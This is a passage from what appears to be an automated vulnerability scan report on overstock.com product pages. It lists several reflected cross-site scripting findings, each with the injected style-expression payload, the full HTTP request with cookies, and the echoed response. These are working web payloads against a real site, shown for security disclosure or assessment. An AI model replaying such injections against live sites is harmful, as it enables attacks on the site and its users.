Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:05 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408225260:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:05 GMT; Path=/
Set-Cookie: mxcproclicks=4587463|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:05 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Fr
...[SNIP]...
<input type="hidden" name="c1548"style="x:expression(alert(1))"8fddb195cf9" value="1"/>
...[SNIP]...

2.36. http://www.overstock.com/Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d63f"style%3d"x%3aexpression(alert(1))"5854008dc02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d63f"style="x:expression(alert(1))"5854008dc02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Fringed-Pashmina-Wrap/4587460/product.html?5d63f"style%3d"x%3aexpression(alert(1))"5854008dc02=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:42 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4587460|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:42 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405082348:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Fr
...[SNIP]...
<input type="hidden" name="5d63f"style="x:expression(alert(1))"5854008dc02" value="1"/>
...[SNIP]...

2.37. http://www.overstock.com/Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50570"style%3d"x%3aexpression(alert(1))"1fd492eab32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50570"style="x:expression(alert(1))"1fd492eab32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Glaze-by-Adi-Womens-Faux-Suede-Buckle-Accent-Tall-Boots/5162852/product.html?50570"style%3d"x%3aexpression(alert(1))"1fd492eab32=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:01 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5162852|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408281246:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=59
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124802

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Gl
...[SNIP]...
<input type="hidden" name="50570"style="x:expression(alert(1))"1fd492eab32" value="1"/>
...[SNIP]...

2.38. http://www.overstock.com/Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8767c"style%3d"x%3aexpression(alert(1))"30caaea086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8767c"style="x:expression(alert(1))"30caaea086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Grane-Womens-Double-breasted-Military-Coat/5237784/product.html?8767c"style%3d"x%3aexpression(alert(1))"30caaea086=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:54:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:54:51 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408091353:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5237784|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:54:51 GMT; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112892

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Gr
...[SNIP]...
<input type="hidden" name="8767c"style="x:expression(alert(1))"30caaea086" value="1"/>
...[SNIP]...

2.39. http://www.overstock.com/Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6938"style%3d"x%3aexpression(alert(1))"651945f2caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6938"style="x:expression(alert(1))"651945f2caa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Guess-Womens-Oversize-Flower-Sunglasses/4226816/product.html?c6938"style%3d"x%3aexpression(alert(1))"651945f2caa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:41 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:41 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4226816|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:41 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408201034:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:41 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=43
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111547

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Gu
...[SNIP]...
<input type="hidden" name="c6938"style="x:expression(alert(1))"651945f2caa" value="1"/>
...[SNIP]...

2.40. http://www.overstock.com/Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4126"style%3d"x%3aexpression(alert(1))"2341eb9682a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4126"style="x:expression(alert(1))"2341eb9682a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Jessica-Simpson-Womens-Double-breasted-Coat/5149474/product.html?a4126"style%3d"x%3aexpression(alert(1))"2341eb9682a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:12 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:12 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408112093:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5149474|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:12 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:12 GMT; Path=/
Keep-Alive: timeout=5, max=23
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116035

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Je
...[SNIP]...
<input type="hidden" name="a4126"style="x:expression(alert(1))"2341eb9682a" value="1"/>
...[SNIP]...

2.41. http://www.overstock.com/Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87978"style%3d"x%3aexpression(alert(1))"f1df361dfda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87978"style="x:expression(alert(1))"f1df361dfda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/JoJo-Designs-Girls-2-piece-Blue-Brown-Floral-Zebra-Rumba-Set/4245360/product.html?87978"style%3d"x%3aexpression(alert(1))"f1df361dfda=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:28 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:28 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4245360|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:28 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408128657:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:28 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Jo
...[SNIP]...
<input type="hidden" name="87978"style="x:expression(alert(1))"f1df361dfda" value="1"/>
...[SNIP]...

2.42. http://www.overstock.com/Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca310"style%3d"x%3aexpression(alert(1))"3bd84c4e9aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca310"style="x:expression(alert(1))"3bd84c4e9aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Journee-Collection-Womens-Luxury-Shawl/3876012/product.html?ca310"style%3d"x%3aexpression(alert(1))"3bd84c4e9aa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:45 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289405085388:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:45 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
